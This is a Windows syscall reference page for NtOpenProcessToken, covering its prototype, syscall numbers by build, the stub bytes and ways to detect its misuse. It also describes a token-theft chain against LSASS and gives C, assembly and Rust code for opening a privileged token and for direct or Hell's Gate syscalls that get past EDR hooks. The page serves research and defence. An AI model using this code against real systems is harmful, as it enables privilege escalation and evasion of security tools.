ntoskrnl.exeT1134T1134.001T1106

NtOpenProcessToken

Opens the access token associated with a process and returns a handle to it.

Prototype

NTSTATUS NtOpenProcessToken(
  HANDLE       ProcessHandle,
  ACCESS_MASK  DesiredAccess,
  PHANDLE      TokenHandle
);

Arguments

Name	Type	Dir	Description
ProcessHandle	HANDLE	in	Handle to the process whose token is being opened. Must have PROCESS_QUERY_INFORMATION (or PROCESS_QUERY_LIMITED_INFORMATION).
DesiredAccess	ACCESS_MASK	in	Token rights requested, e.g. TOKEN_QUERY (0x8), TOKEN_DUPLICATE (0x2), TOKEN_ADJUST_PRIVILEGES (0x20), TOKEN_ALL_ACCESS.
TokenHandle	PHANDLE	out	Receives the handle to the opened token on success. Must be closed with NtClose.

Syscall IDs by Windows version

Windows version	Syscall ID	Build
Win10 1507	0x114	win10-1507
Win10 1607	0x119	win10-1607
Win10 1703	0x11D	win10-1703
Win10 1709	0x11F	win10-1709
Win10 1803	0x121	win10-1803
Win10 1809	0x122	win10-1809
Win10 1903	0x123	win10-1903
Win10 1909	0x123	win10-1909
Win10 2004	0x128	win10-2004
Win10 20H2	0x128	win10-20h2
Win10 21H1	0x128	win10-21h1
Win10 21H2	0x129	win10-21h2
Win10 22H2	0x129	win10-22h2
Win11 21H2	0x12F	win11-21h2
Win11 22H2	0x131	win11-22h2
Win11 23H2	0x131	win11-23h2
Win11 24H2	0x133	win11-24h2
Server 2016	0x119	winserver-2016
Server 2019	0x122	winserver-2019
Server 2022	0x12E	winserver-2022
Server 2025	0x133	winserver-2025

Kernel module

ntoskrnl.exe → NtOpenProcessToken

Related APIs

OpenProcessTokenNtOpenProcessTokenExNtOpenThreadTokenNtDuplicateTokenNtQueryInformationTokenNtAdjustPrivilegesToken

Syscall stub

4C 8B D1            mov r10, rcx
B8 33 01 00 00      mov eax, 0x133
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

NtOpenProcessToken is the legacy form of the token-open primitive, kept for source compatibility with the original NT API. Modern code paths in `kernel32!OpenProcessToken` actually call `NtOpenProcessTokenEx` with `HandleAttributes = 0`. The SSN drifts considerably across builds — from `0x114` on Windows 10 1507 to `0x133` on Windows 11 24H2 — which makes it a poor candidate for hardcoded SSNs and a textbook case for Hell's Gate / Halo's Gate dynamic resolution. Internally, it dispatches through `SeQueryAuthenticationIdToken` and `ObOpenObjectByPointer` against the EPROCESS->Token pointer.

Common malware usage

Always the first step in a token-theft chain: open a high-integrity process (winlogon, services.exe, lsass.exe) with `TOKEN_DUPLICATE | TOKEN_QUERY`, then call NtDuplicateToken to forge a SecurityImpersonation token, then NtSetInformationThread (ThreadImpersonationToken) or CreateProcessWithTokenW to spawn under the stolen identity. This is the classic Incognito / Mimikatz `token::elevate` pattern and the foundation of most post-exploitation lateral movement in Conti, BlackCat and APT29 intrusions.

Mimikatz (tooling)ContiBlackCat / ALPHVAPT29 / Cozy BearFIN7Lazarus

Detection opportunities

Opening a token on a process you do not own already requires SeDebugPrivilege in most cases — Windows Security Event 4672 (Special Privileges Assigned) on the calling logon session is a strong precursor. Event 4663 (object access) with object type `Token` and 4673 (Sensitive Privilege Use) fire when the operation succeeds against a privileged process. The ETW provider `Microsoft-Windows-Kernel-Audit-API-Calls` emits `PsOpenProcessToken` events. EDRs hook `ntdll!NtOpenProcessToken`; direct syscalls bypass user-mode hooks but the kernel still issues SE_TOKEN_USER object-manager auditing on protected processes.

Direct syscall examples

asmx64 direct stub (Win11 24H2)

; Direct syscall stub for NtOpenProcessToken — SSN 0x133 on Win11 24H2
; NOTE: SSN varies across builds; resolve dynamically in production.
NtOpenProcessToken PROC
    mov  r10, rcx          ; ProcessHandle
    mov  eax, 133h         ; SSN (Win11 24H2)
    syscall
    ret
NtOpenProcessToken ENDP

cToken-steal primer (open LSASS token, classic Incognito chain)

// Step 1 of an impersonation chain: open a privileged process token.
// Requires SeDebugPrivilege on the calling thread.
HANDLE hLsass = NULL, hToken = NULL;
OBJECT_ATTRIBUTES oa = { sizeof(oa) };
CLIENT_ID cid = { (HANDLE)(ULONG_PTR)lsassPid, NULL };

NTSTATUS s = NtOpenProcess(&hLsass,
                           PROCESS_QUERY_LIMITED_INFORMATION,
                           &oa, &cid);
if (NT_SUCCESS(s)) {
    // TOKEN_DUPLICATE so we can later forge an impersonation token.
    s = NtOpenProcessToken(hLsass,
                           TOKEN_DUPLICATE | TOKEN_QUERY,
                           &hToken);
    // -> feed hToken into NtDuplicateToken -> NtSetInformationThread
}

rustHell's Gate dynamic SSN lookup

// Resolve NtOpenProcessToken SSN at runtime — SSN moves every Windows build.
use std::arch::asm;
use std::ffi::CString;
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::System::LibraryLoader::{GetModuleHandleA, GetProcAddress};

unsafe fn ssn_from_export(name: &str) -> u32 {
    let ntdll = GetModuleHandleA(b"ntdll.dll\0".as_ptr());
    let c = CString::new(name).unwrap();
    let p = GetProcAddress(ntdll, c.as_ptr() as *const u8) as *const u8;
    // Pattern: 4C 8B D1 B8 ?? ?? 00 00
    assert_eq!(*p.add(0), 0x4C);
    assert_eq!(*p.add(3), 0xB8);
    (*p.add(4) as u32) | ((*p.add(5) as u32) << 8)
}

#[unsafe(naked)]
unsafe extern "system" fn syscall_thunk(
    _process: HANDLE,
    _desired: u32,
    _token_out: *mut HANDLE,
    _ssn: u32,
) -> i32 {
    asm!(
        "mov r10, rcx",
        "mov eax, r9d",   // SSN supplied as 4th arg
        "syscall",
        "ret",
        options(noreturn),
    );
}

MITRE ATT&CK mappings

Last verified: 2026-05-20